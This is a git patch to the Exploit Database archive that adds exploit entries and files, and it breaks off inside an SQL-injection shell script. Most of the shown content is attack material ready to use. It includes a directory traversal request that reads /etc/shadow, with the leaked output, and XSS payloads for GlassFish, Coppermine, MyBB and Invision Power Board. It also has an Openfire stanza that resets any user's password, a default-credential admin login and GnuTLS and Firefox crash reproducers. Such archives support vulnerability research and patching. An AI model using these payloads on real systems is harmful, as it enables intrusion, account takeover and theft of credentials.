From 038ba787ccd403319e7b74ddc3c4e6323f165c8c Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Wed, 23 Apr 2014 04:35:22 +0000
Subject: [PATCH] Updated 04_23_2014

---
 files.csv                            |  24 ++-
 platforms/cgi/remote/32962.txt       |  36 ++++
 platforms/hardware/webapps/32859.txt |   2 +-
 platforms/hardware/webapps/32973.txt |  42 ++++
 platforms/linux/dos/32961.html       |   7 +
 platforms/linux/dos/32964.c          |  92 +++++++++
 platforms/linux/remote/32965.c       |  73 +++++++
 platforms/multiple/remote/32945.txt  |  11 ++
 platforms/multiple/remote/32967.txt  |  14 ++
 platforms/multiple/remote/32971.txt  |   9 +
 platforms/multiple/remote/32974.txt  |   9 +
 platforms/multiple/remote/32975.txt  |   9 +
 platforms/multiple/remote/32977.txt  |   9 +
 platforms/multiple/remote/32978.txt  |   9 +
 platforms/multiple/remote/32979.txt  |   9 +
 platforms/multiple/remote/32980.txt  |   9 +
 platforms/multiple/remote/32981.txt  |   9 +
 platforms/php/webapps/32960.txt      |  13 ++
 platforms/php/webapps/32963.txt      |   9 +
 platforms/php/webapps/32966.txt      |   9 +
 platforms/php/webapps/32968.sh       |  35 ++++
 platforms/php/webapps/32969.txt      |   7 +
 platforms/php/webapps/32976.php      | 282 +++++++++++++++++++++++++++
 platforms/windows/remote/32959.rb    | 121 ++++++++++++
 24 files changed, 847 insertions(+), 2 deletions(-)
 create mode 100755 platforms/cgi/remote/32962.txt
 create mode 100755 platforms/hardware/webapps/32973.txt
 create mode 100755 platforms/linux/dos/32961.html
 create mode 100755 platforms/linux/dos/32964.c
 create mode 100755 platforms/linux/remote/32965.c
 create mode 100755 platforms/multiple/remote/32945.txt
 create mode 100755 platforms/multiple/remote/32967.txt
 create mode 100755 platforms/multiple/remote/32971.txt
 create mode 100755 platforms/multiple/remote/32974.txt
 create mode 100755 platforms/multiple/remote/32975.txt
 create mode 100755 platforms/multiple/remote/32977.txt
 create mode 100755 platforms/multiple/remote/32978.txt
 create mode 100755 platforms/multiple/remote/32979.txt
 create mode 100755 platforms/multiple/remote/32980.txt
 create mode 100755 platforms/multiple/remote/32981.txt
 create mode 100755 platforms/php/webapps/32960.txt
 create mode 100755 platforms/php/webapps/32963.txt
 create mode 100755 platforms/php/webapps/32966.txt
 create mode 100755 platforms/php/webapps/32968.sh
 create mode 100755 platforms/php/webapps/32969.txt
 create mode 100755 platforms/php/webapps/32976.php
 create mode 100755 platforms/windows/remote/32959.rb

diff --git a/files.csv b/files.csv
index 7aa6af463..26462fcdf 100755
--- a/files.csv
+++ b/files.csv
@@ -29612,7 +29612,7 @@ id,file,description,date,author,platform,type,port
 32856,platforms/linux/dos/32856.txt,"MPlayer Malformed AAC File Handling DoS",2008-10-07,"Hanno Bock",linux,dos,0
 32857,platforms/linux/dos/32857.txt,"MPlayer Malformed OGM File Handling DoS",2008-10-07,"Hanno Bock",linux,dos,0
 32858,platforms/java/webapps/32858.txt,"Sun Java System Messenger Express 6.3-0.15 'error' Parameter Cross-Site Scripting Vulnerability",2009-03-17,syniack,java,webapps,0
-32859,platforms/hardware/webapps/32859.txt,"Sagem Fast 3304-V2 - Authentification Bypass",2014-04-14,"Yassin Aboukir",hardware,webapps,0
+32859,platforms/hardware/webapps/32859.txt,"Sagem Fast 3304-V2 - Authentication Bypass",2014-04-14,"Yassin Aboukir",hardware,webapps,0
 32860,platforms/java/dos/32860.txt,"Sun Java System Calendar Server 6.3 Duplicate URI Request Denial of Service Vulnerability",2009-03-31,"SCS team",java,dos,0
 32861,platforms/php/webapps/32861.txt,"WordPress Theme LineNity 1.20 - Local File Inclusion",2014-04-14,"felipe andrian",php,webapps,0
 32862,platforms/java/webapps/32862.txt,"Sun Java System Calendar Server 6 'command.shtml' Cross Site Scripting Vulnerability",2009-03-31,"SCS team",java,webapps,0
@@ -29693,6 +29693,7 @@ id,file,description,date,author,platform,type,port
 32942,platforms/linux/remote/32942.txt,"Mozilla Multiple Products Server Refresh Header XSS",2009-04-22,"Olli Pettay",linux,remote,0
 32943,platforms/hardware/webapps/32943.txt,"Teracom Modem T2-B-Gawv1.4U10Y-BI - CSRF Vulnerability",2014-04-20,"Rakesh S",hardware,webapps,0
 32944,platforms/multiple/remote/32944.txt,"SAP cFolders Cross Site Scripting And HTML Injection Vulnerabilities",2009-04-21,"Digital Security Research Group",multiple,remote,0
+32945,platforms/multiple/remote/32945.txt,"010 Editor 3.0.4 File Parsing Multiple Buffer Overflow Vulnerabilities",2009-04-21,"Le Duc Anh",multiple,remote,0
 32946,platforms/freebsd/local/32946.c,"FreeBSD <= 7.1 libc Berkley DB Interface Uninitialized Memory Local Information Disclosure Vulnerability",2009-01-15,"Jaakko Heinonen",freebsd,local,0
 32947,platforms/linux/local/32947.txt,"DirectAdmin <= 1.33.3 '/CMD_DB' Backup Action Insecure Temporary File Creation Vulnerability",2009-04-22,anonymous,linux,local,0
 32948,platforms/php/webapps/32948.txt,"New5starRating 1.0 'admin/control_panel_sample.php' SQL Injection Vulnerability",2009-04-22,zer0day,php,webapps,0
@@ -29706,3 +29707,24 @@ id,file,description,date,author,platform,type,port
 32956,platforms/windows/dos/32956.py,"RealNetworks RealPlayer Gold 10.0 MP3 File Handling Remote Denial of Service Vulnerability",2009-04-27,"Abdul-Aziz Hariri",windows,dos,0
 32957,platforms/windows/remote/32957.txt,"DWebPro 6.8.26 Directory Traversal Vulnerability and Arbitrary File Disclosure Vulnerability",2009-04-27,"Alfons Luja",windows,remote,0
 32958,platforms/php/webapps/32958.txt,"MataChat 'input.php' Multiple Cross Site Scripting Vulnerabilities",2009-04-27,Am!r,php,webapps,0
+32959,platforms/windows/remote/32959.rb,"Adobe Flash Player Regular Expression Heap Overflow",2014-04-21,metasploit,windows,remote,0
+32960,platforms/php/webapps/32960.txt,"Invision Power Board 3.0 Multiple HTML-Injection and Information Disclosure Vulnerabilities",2009-04-27,brain[pillow],php,webapps,0
+32961,platforms/linux/dos/32961.html,"Mozilla Firefox 3.0.9 'nsTextFrame::ClearTextRun()' Remote Memory Corruption Vulnerability",2009-04-27,"Marc Gueury",linux,dos,0
+32962,platforms/cgi/remote/32962.txt,"LevelOne AMG-2000 2.00.00 Security Bypass Vulnerability",2009-04-29,J.Greil,cgi,remote,0
+32963,platforms/php/webapps/32963.txt,"Coppermine Photo Gallery <= 1.4.21 'css' Parameter Cross-Site Scripting Vulnerability",2009-04-29,"Gerendi Sandor Attila",php,webapps,0
+32964,platforms/linux/dos/32964.c,"GnuTLS 2.6.x libgnutls lib/pk-libgcrypt.c Malformed DSA Key Handling Remote DoS",2009-04-30,"Miroslav Kratochvil",linux,dos,0
+32965,platforms/linux/remote/32965.c,"GnuTLS 2.6.x libgnutls lib/gnutls_pk.c DSA Key Storage Remote Spoofing",2009-04-30,"Miroslav Kratochvil",linux,remote,0
+32966,platforms/php/webapps/32966.txt,"MyBB 1.4.5 Multiple Security Vulnerabilities",2009-05-03,"Jacques Copeau",php,webapps,0
+32967,platforms/multiple/remote/32967.txt,"Openfire 3.x jabber:iq:auth 'passwd_change' Remote Password Change Vulnerability",2009-05-04,"Daryl Herzmann",multiple,remote,0
+32968,platforms/php/webapps/32968.sh,"IceWarp Merak Mail Server 9.4.1 Groupware Component Multiple SQL Injection Vulnerabilities",2009-05-05,"RedTeam Pentesting",php,webapps,0
+32969,platforms/php/webapps/32969.txt,"IceWarp Merak Mail Server 9.4.1 'cleanHTML()' Function Cross-Site Scripting Vulnerability",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0
+32971,platforms/multiple/remote/32971.txt,"Glassfish Enterprise Server 2.1 Admin Console /applications/applications.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
+32973,platforms/hardware/webapps/32973.txt,"Sixnet Sixview 2.4.1 - Web Console Directory Traversal",2014-04-22,"daniel svartman",hardware,webapps,0
+32974,platforms/multiple/remote/32974.txt,"Glassfish Enterprise Server 2.1 Admin Console /configuration/configuration.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
+32975,platforms/multiple/remote/32975.txt,"Glassfish Enterprise Server 2.1 Admin Console /customMBeans/customMBeans.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
+32976,platforms/php/webapps/32976.php,"No-CMS 0.6.6 rev 1 - Admin Account Hijacking / RCE Exploit via Static Encryption Key",2014-04-22,"Mehmet Dursun Ince",php,webapps,0
+32977,platforms/multiple/remote/32977.txt,"Glassfish Enterprise Server 2.1 Admin Console /resourceNode/resources.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
+32978,platforms/multiple/remote/32978.txt,"Glassfish Enterprise Server 2.1 Admin Console /sysnet/registration.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
+32979,platforms/multiple/remote/32979.txt,"Glassfish Enterprise Server 2.1 Admin Console /webService/webServicesGeneral.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
+32980,platforms/multiple/remote/32980.txt,"Glassfish Enterprise Server 2.1 Admin Console /configuration/auditModuleEdit.jsf name Parameter XSS",2009-05-05,DSecRG,multiple,remote,0
+32981,platforms/multiple/remote/32981.txt,"Glassfish Enterprise Server 2.1 Admin Console /resourceNode/jdbcResourceEdit.jsf name Parameter XSS",2009-05-05,DSecRG,multiple,remote,0
diff --git a/platforms/cgi/remote/32962.txt b/platforms/cgi/remote/32962.txt
new file mode 100755
index 000000000..422864ee1
--- /dev/null
+++ b/platforms/cgi/remote/32962.txt
@@ -0,0 +1,36 @@
+source: http://www.securityfocus.com/bid/34760/info
+
+LevelOne AMG-2000 is prone to a security-bypass vulnerability.
+
+Attackers may exploit this issue to gain access to the administrative interface and internal computers from an outside network. This may aid in further attacks.
+
+Note that valid authentication credentials must still be provided to authenticate to the device's administrative interface. Attackers may use default accounts such as 'operator' or 'manager' if the default passwords have not been changed.
+
+LevelOne AMG-2000 running firmware 2.00.00build00600 and prior versions are affected.
+
+The following examples are available:
+
+HTTP request to access the administration interface login page from the WLAN
+
+
+GET http://127.0.0.1/ HTTP/1.1
+Host: 192.168.0.1:2128
+[...]
+
+
+HTTP request to login to the admin interface with the user "manager"
+
+
+POST http://127.0.0.1/check.shtml HTTP/1.1
+Host: 192.168.0.1:2128
+[...]
+
+username=manager&password=manager&Submit=ENTER
+
+
+HTTP request to access other internal IP addresses configured on the private LAN port
+
+
+GET http://10.0.0.1/ HTTP/1.1
+Host: 192.168.0.1:2128
+[...] 
\ No newline at end of file
diff --git a/platforms/hardware/webapps/32859.txt b/platforms/hardware/webapps/32859.txt
index 7fc381d2c..97a12620d 100755
--- a/platforms/hardware/webapps/32859.txt
+++ b/platforms/hardware/webapps/32859.txt
@@ -1,4 +1,4 @@
-# Title              : Sagem F@st 3304-V2 Authentification Bypass
+# Title              : Sagem F@st 3304-V2 Authentication Bypass
 # Vendor             : http://www.sagemcom.com
 # Severity           : High
 # Tested on          : Firefox, Google Chrome, Internet Explorer
diff --git a/platforms/hardware/webapps/32973.txt b/platforms/hardware/webapps/32973.txt
new file mode 100755
index 000000000..32b470bbf
--- /dev/null
+++ b/platforms/hardware/webapps/32973.txt
@@ -0,0 +1,42 @@
+#Exploit Title: Sixnet sixview web console directory traversal
+#Date: 2014-04-21
+#Exploit Author: daniel svartman
+#Vendor Homepage: www.sixnet.com
+#Software Link: Not available, hardware piece - appliance
+#Version: 2.4.1
+#Tested on: Sixnet Sixview web console  (Linux based appliance)
+#CVE : 2014-2976
+
+
+PoV, Sixnet sixview web console handle requests through HTTP on port 18081.
+These requests can be received either through GET or POST requests.
+I discovered that GET requests are not validated at the server side,
+allowing an attacker to request arbitrary files from the supporting OS.
+
+Below is an example of the affected URL and the received answer using
+netcat:
+
+
+ncat  <HOSTNAME> 18081
+GET /../../../../../../../../../../etc/shadow HTTP/1.1
+
+
+HTTP/1.1 200 OK
+Connection: Keep-Alive
+Content-Type: text/html
+Keep-Alive: timeout=15, max=50
+Date: <SNIP>
+Last-Modified: <SNIP>
+Content-Length: 1025
+
+root:<REMOVED>:15655:0:99999:7:::
+bin:*:15513:0:99999:7:::
+daemon:*:15513:0:99999:7:::
+adm:*:15513:0:99999:7:::
+lp:*:15513:0:99999:7:::
+sync:*:15513:0:99999:7:::
+shutdown:*:15513:0:99999:7:::
+halt:*:15513:0:99999:7:::
+mail:*:15513:0:99999:7:::
+uucp:*:15513:0:99999:7:::
+<SNIP>
diff --git a/platforms/linux/dos/32961.html b/platforms/linux/dos/32961.html
new file mode 100755
index 000000000..66cc87ca5
--- /dev/null
+++ b/platforms/linux/dos/32961.html
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/34743/info
+
+Mozilla Firefox is prone to a remote memory-corruption vulnerability.
+
+Successful exploits will allow remote attackers to execute arbitrary code within the context of the affected browser or crash the browser, denying service to legitimate users. 
+
+<html><head><title> Bug 489647 - New 1.9.0.9 topcrash [@nsTextFrame::ClearTextRun()]</title></head> <body> <div id="a" style="white-space: pre;"> m</div> <script> function doe() { document.getElementById('a').childNodes[0].splitText(1); } setTimeout(doe, 100); </script> </body> </html> 
\ No newline at end of file
diff --git a/platforms/linux/dos/32964.c b/platforms/linux/dos/32964.c
new file mode 100755
index 000000000..d8e063505
--- /dev/null
+++ b/platforms/linux/dos/32964.c
@@ -0,0 +1,92 @@
+source: http://www.securityfocus.com/bid/34783/info
+
+GnuTLS is prone to multiple remote vulnerabilities:
+
+- A remote code-execution vulnerability
+- A denial-of-service vulnerability
+- A signature-generation vulnerability
+- A signature-verification vulnerability
+
+An attacker can exploit these issues to potentially execute arbitrary code, trigger denial-of-service conditions, carry out attacks against data signed with weak signatures, and cause clients to accept expired or invalid certificates from servers.
+
+Versions prior to GnuTLS 2.6.6 are vulnerable. 
+
+/*
+ * Small code to reproduce the CVE-2009-1415 double-free problem.
+ *
+ * Build it using:
+ *
+ *  gcc -o cve-2009-1415 cve-2009-1415.c -lgnutls
+ *
+ * If your gnutls library is OK then running it will just print 'success!'.
+ *
+ * If your gnutls library is buggy, then running it will crash like this:
+ *
+ * ** glibc detected *** ./cve-2009-1415: munmap_chunk(): invalid pointer: 0xb7f80a9c ***
+ * ======= Backtrace: =========
+ * ...
+ */
+
+#include <stdio.h>
+#include <stdarg.h>
+#include <stdlib.h>
+
+#include <gnutls/gnutls.h>
+
+static char dsa_cert[] =
+  "-----BEGIN CERTIFICATE-----\n"
+  "MIIDbzCCAtqgAwIBAgIERiYdRTALBgkqhkiG9w0BAQUwGTEXMBUGA1UEAxMOR251\n"
+  "VExTIHRlc3QgQ0EwHhcNMDcwNDE4MTMyOTQxWhcNMDgwNDE3MTMyOTQxWjA3MRsw\n"
+  "GQYDVQQKExJHbnVUTFMgdGVzdCBzZXJ2ZXIxGDAWBgNVBAMTD3Rlc3QuZ251dGxz\n"
+  "Lm9yZzCCAbQwggEpBgcqhkjOOAQBMIIBHAKBgLmE9VqBvhoNxYpzjwybL5u2DkvD\n"
+  "dBp/ZK2d8yjFoEe8m1dW8ZfVfjcD6fJM9OOLfzCjXS+7oaI3wuo1jx+xX6aiXwHx\n"
+  "IzYr5E8vLd2d1TqmOa96UXzSJY6XdM8exXtLdkOBBx8GFLhuWBLhkOI3b9Ib7GjF\n"
+  "WOLmMOBqXixjeOwHAhSfVoxIZC/+jap6bZbbBF0W7wilcQKBgGIGfuRcdgi3Rhpd\n"
+  "15fUKiH7HzHJ0vT6Odgn0Zv8J12nCqca/FPBL0PCN8iFfz1Mq12BMvsdXh5UERYg\n"
+  "xoBa2YybQ/Dda6D0w/KKnDnSHHsP7/ook4/SoSLr3OCKi60oDs/vCYXpNr2LelDV\n"
+  "e/clDWxgEcTvcJDP1hvru47GPjqXA4GEAAKBgA+Kh1fy0cLcrN9Liw+Luin34QPk\n"
+  "VfqymAfW/RKxgLz1urRQ1H+gDkPnn8l4EV/l5Awsa2qkNdy9VOVgNpox0YpZbmsc\n"
+  "ur0uuut8h+/ayN2h66SD5out+vqOW9c3yDI+lsI+9EPafZECD7e8+O+P90EAXpbf\n"
+  "DwiW3Oqy6QaCr9Ivo4GTMIGQMAwGA1UdEwEB/wQCMAAwGgYDVR0RBBMwEYIPdGVz\n"
+  "dC5nbnV0bHMub3JnMBMGA1UdJQQMMAoGCCsGAQUFBwMBMA8GA1UdDwEB/wQFAwMH\n"
+  "gAAwHQYDVR0OBBYEFL/su87Y6HtwVuzz0SuS1tSZClvzMB8GA1UdIwQYMBaAFOk8\n"
+  "HPutkm7mBqRWLKLhwFMnyPKVMAsGCSqGSIb3DQEBBQOBgQBCsrnfD1xzh8/Eih1f\n"
+  "x+M0lPoX1Re5L2ElHI6DJpHYOBPwf9glwxnet2+avzgUQDUFwUSxOhodpyeaACXD\n"
+  "o0gGVpcH8sOBTQ+aTdM37hGkPxoXjtIkR/LgG5nP2H2JRd5TkW8l13JdM4MJFB4W\n"
+  "QcDzQ8REwidsfh9uKAluk1c/KQ==\n"
+  "-----END CERTIFICATE-----\n";
+
+const gnutls_datum_t dsa_cert_dat = {
+  dsa_cert, sizeof (dsa_cert)
+};
+
+int
+main (void)
+{
+  gnutls_x509_crt_t crt;
+  gnutls_datum_t data = { "foo", 3 };
+  gnutls_datum_t sig = { "bar", 3 };
+  int ret;
+
+  gnutls_global_init ();
+
+  ret = gnutls_x509_crt_init (&crt);
+  if (ret < 0)
+    return 1;
+
+  ret = gnutls_x509_crt_import (crt, &dsa_cert_dat, GNUTLS_X509_FMT_PEM);
+  if (ret < 0)
+    return 1;
+
+  ret = gnutls_x509_crt_verify_data (crt, 0, &data, &sig);
+  if (ret < 0)
+    return 1;
+
+  printf ("success!\n");
+
+  gnutls_x509_crt_deinit (crt);
+  gnutls_global_deinit ();
+
+  return 0;
+}
+
diff --git a/platforms/linux/remote/32965.c b/platforms/linux/remote/32965.c
new file mode 100755
index 000000000..41b8f3c73
--- /dev/null
+++ b/platforms/linux/remote/32965.c
@@ -0,0 +1,73 @@
+source: http://www.securityfocus.com/bid/34783/info
+ 
+GnuTLS is prone to multiple remote vulnerabilities:
+ 
+- A remote code-execution vulnerability
+- A denial-of-service vulnerability
+- A signature-generation vulnerability
+- A signature-verification vulnerability
+ 
+An attacker can exploit these issues to potentially execute arbitrary code, trigger denial-of-service conditions, carry out attacks against data signed with weak signatures, and cause clients to accept expired or invalid certificates from servers.
+ 
+Versions prior to GnuTLS 2.6.6 are vulnerable.
+
+/*
+ * Small code to reproduce the CVE-2009-1416 bad DSA key problem.
+ *
+ * Build it using:
+ *
+ *  gcc -o cve-2009-1416 cve-2009-1416.c -lgnutls
+ *
+ * If your gnutls library is OK then running it will print 'success!'.
+ *
+ * If your gnutls library is buggy then running it will print 'buggy'.
+ *
+ */
+
+#include <stdio.h>
+#include <stdarg.h>
+#include <stdlib.h>
+
+#include <gcrypt.h>
+#include <gnutls/gnutls.h>
+
+int
+main (void)
+{
+  gnutls_x509_privkey_t key;
+  gnutls_datum_t p, q, g, y, x;
+  int ret;
+
+  gnutls_global_init ();
+  gcry_control (GCRYCTL_ENABLE_QUICK_RANDOM, 0);
+
+  ret = gnutls_x509_privkey_init (&key);
+  if (ret < 0)
+    return 1;
+
+  ret = gnutls_x509_privkey_generate (key, GNUTLS_PK_DSA, 512, 0);
+  if (ret < 0)
+    return 1;
+
+  ret = gnutls_x509_privkey_export_dsa_raw (key, &p, &q, &g, &y, &x);
+  if (ret < 0)
+    return 1;
+
+  if (q.size == 3 && memcmp (q.data, "\x01\x00\x01", 3) == 0)
+    printf ("buggy\n");
+  else
+    printf ("success!\n");
+
+  gnutls_free (p.data);
+  gnutls_free (q.data);
+  gnutls_free (g.data);
+  gnutls_free (y.data);
+  gnutls_free (x.data);
+
+  gnutls_x509_privkey_deinit (key);
+  gnutls_global_deinit ();
+
+  return 0;
+}
+
+ 
\ No newline at end of file
diff --git a/platforms/multiple/remote/32945.txt b/platforms/multiple/remote/32945.txt
new file mode 100755
index 000000000..bbdad7eae
--- /dev/null
+++ b/platforms/multiple/remote/32945.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/34662/info
+
+010 Editor is prone to multiple buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input.
+
+Successfully exploiting these issues may allow remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts will cause denial-of-service conditions.
+
+UPDATE (April 22, 2009): Since script files and templates may include script code used to automate editor functions, the privilege gained by a successful exploit is disputed. Please see the references for more information. We will update this BID as more information emerges.
+
+Versions prior to 010 Editor 3.0.5 are vulnerable.
+
+http://www.exploit-db.com/sploits/32945.zip
\ No newline at end of file
diff --git a/platforms/multiple/remote/32967.txt b/platforms/multiple/remote/32967.txt
new file mode 100755
index 000000000..1f2de172c
--- /dev/null
+++ b/platforms/multiple/remote/32967.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/34804/info
+
+Openfire is prone to a vulnerability that can permit an attacker to change the password of arbitrary users.
+
+Exploiting this issue can allow the attacker to gain unauthorized access to the affected application and to completely compromise victims' accounts.
+
+Versions prior to Openfire 3.6.4 are vulnerable.
+
+<iq type='set' id='passwd_change'>
+<query xmlns='jabber:iq:auth'>
+<username>test2</username>
+<password>newillegalychangedpassword</password>
+</query>
+</iq> 
\ No newline at end of file
diff --git a/platforms/multiple/remote/32971.txt b/platforms/multiple/remote/32971.txt
new file mode 100755
index 000000000..3f4a0be72
--- /dev/null
+++ b/platforms/multiple/remote/32971.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/34824/info
+
+GlassFish Enterprise Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
+
+GlassFish Enterprise Server 2.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/applications/applications.jsf?&#039;);};alert("DSecRG_XSS");</script><!--
\ No newline at end of file
diff --git a/platforms/multiple/remote/32974.txt b/platforms/multiple/remote/32974.txt
new file mode 100755
index 000000000..4d7e9feca
--- /dev/null
+++ b/platforms/multiple/remote/32974.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/34824/info
+ 
+GlassFish Enterprise Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+ 
+Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
+ 
+GlassFish Enterprise Server 2.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/configuration/configuration.jsf?&#039;);};alert("DSecRG_XSS");</script><!--
\ No newline at end of file
diff --git a/platforms/multiple/remote/32975.txt b/platforms/multiple/remote/32975.txt
new file mode 100755
index 000000000..7c594da0c
--- /dev/null
+++ b/platforms/multiple/remote/32975.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/34824/info
+  
+GlassFish Enterprise Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+  
+Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
+  
+GlassFish Enterprise Server 2.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/customMBeans/customMBeans.jsf?&#039;);};alert("DSecRG_XSS");</script><!--
\ No newline at end of file
diff --git a/platforms/multiple/remote/32977.txt b/platforms/multiple/remote/32977.txt
new file mode 100755
index 000000000..aad948873
--- /dev/null
+++ b/platforms/multiple/remote/32977.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/34824/info
+   
+GlassFish Enterprise Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+   
+Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
+   
+GlassFish Enterprise Server 2.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/resourceNode/resources.jsf?&#039;);};alert("DSecRG_XSS");</script><!--
\ No newline at end of file
diff --git a/platforms/multiple/remote/32978.txt b/platforms/multiple/remote/32978.txt
new file mode 100755
index 000000000..3f22d34e5
--- /dev/null
+++ b/platforms/multiple/remote/32978.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/34824/info
+    
+GlassFish Enterprise Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+    
+Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
+    
+GlassFish Enterprise Server 2.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/sysnet/registration.jsf?&#039;);};alert("DSecRG_XSS");</script><!--
\ No newline at end of file
diff --git a/platforms/multiple/remote/32979.txt b/platforms/multiple/remote/32979.txt
new file mode 100755
index 000000000..87641d685
--- /dev/null
+++ b/platforms/multiple/remote/32979.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/34824/info
+     
+GlassFish Enterprise Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+     
+Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
+     
+GlassFish Enterprise Server 2.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/webService/webServicesGeneral.jsf?&#039;);};alert("DSecRG_XSS");</script><!--
\ No newline at end of file
diff --git a/platforms/multiple/remote/32980.txt b/platforms/multiple/remote/32980.txt
new file mode 100755
index 000000000..61631e53c
--- /dev/null
+++ b/platforms/multiple/remote/32980.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/34824/info
+      
+GlassFish Enterprise Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+      
+Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
+      
+GlassFish Enterprise Server 2.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/configuration/auditModuleEdit.jsf?name=<IMG SRC=javascript:alert(&#039;DSecRG_XSS&#039;)>
\ No newline at end of file
diff --git a/platforms/multiple/remote/32981.txt b/platforms/multiple/remote/32981.txt
new file mode 100755
index 000000000..89652958b
--- /dev/null
+++ b/platforms/multiple/remote/32981.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/34824/info
+       
+GlassFish Enterprise Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+       
+Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
+       
+GlassFish Enterprise Server 2.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/resourceNode/jdbcResourceEdit.jsf?name=<IMG SRC=javascript:alert(&#039;DSecRG_XSS&#039;)>
\ No newline at end of file
diff --git a/platforms/php/webapps/32960.txt b/platforms/php/webapps/32960.txt
new file mode 100755
index 000000000..495749a70
--- /dev/null
+++ b/platforms/php/webapps/32960.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/34725/info
+
+Invision Power Board is prone to an information-disclosure issue and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to determine path information or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; this may aid in other attacks.
+
+Invision Power Board 3.0.0b5 is vulnerable; other versions may also be affected. 
+
+The following example data and URI are available:
+
+[email]qwe@[twitter]dodo style=`top:expr/* */ession/*bypassed*/(alert(/yahoo/))`do[/twitter]example.com[/email]
+
+http://www.example.com/index.php?app=core&module=ajax&section=register&do=check-display-name&name[]= 
\ No newline at end of file
diff --git a/platforms/php/webapps/32963.txt b/platforms/php/webapps/32963.txt
new file mode 100755
index 000000000..dd22b9542
--- /dev/null
+++ b/platforms/php/webapps/32963.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/34782/info
+
+Coppermine Photo Gallery is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to Coppermine Photo Gallery 1.4.22 are vulnerable. 
+
+http://www.example.com/docs/showdoc.php?css=1>"><ScRiPt%20%0a%0d>alert(123)%3B</ScRiPt> 
\ No newline at end of file
diff --git a/platforms/php/webapps/32966.txt b/platforms/php/webapps/32966.txt
new file mode 100755
index 000000000..18ec554b2
--- /dev/null
+++ b/platforms/php/webapps/32966.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/34798/info
+
+MyBB is prone to multiple security vulnerabilities, including an HTML-injection issue and an unspecified issue.
+
+An attacker may leverage the HTML-injection issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, and to launch other attacks.
+
+MyBB 1.4.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/somefile.png?"><script>alert('xss')</script> 
\ No newline at end of file
diff --git a/platforms/php/webapps/32968.sh b/platforms/php/webapps/32968.sh
new file mode 100755
index 000000000..22a4bfd7b
--- /dev/null
+++ b/platforms/php/webapps/32968.sh
@@ -0,0 +1,35 @@
+source: http://www.securityfocus.com/bid/34820/info
+
+IceWarp Merak Mail Server is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+IceWarp Merak Mail Server 9.4.1 is affected; other versions may be vulnerable as well. 
+
+#!/bin/sh
+
+sid=$1
+uid=$2
+orderby=$3
+if [ -n "$4" ] ; then
+    sql=$4
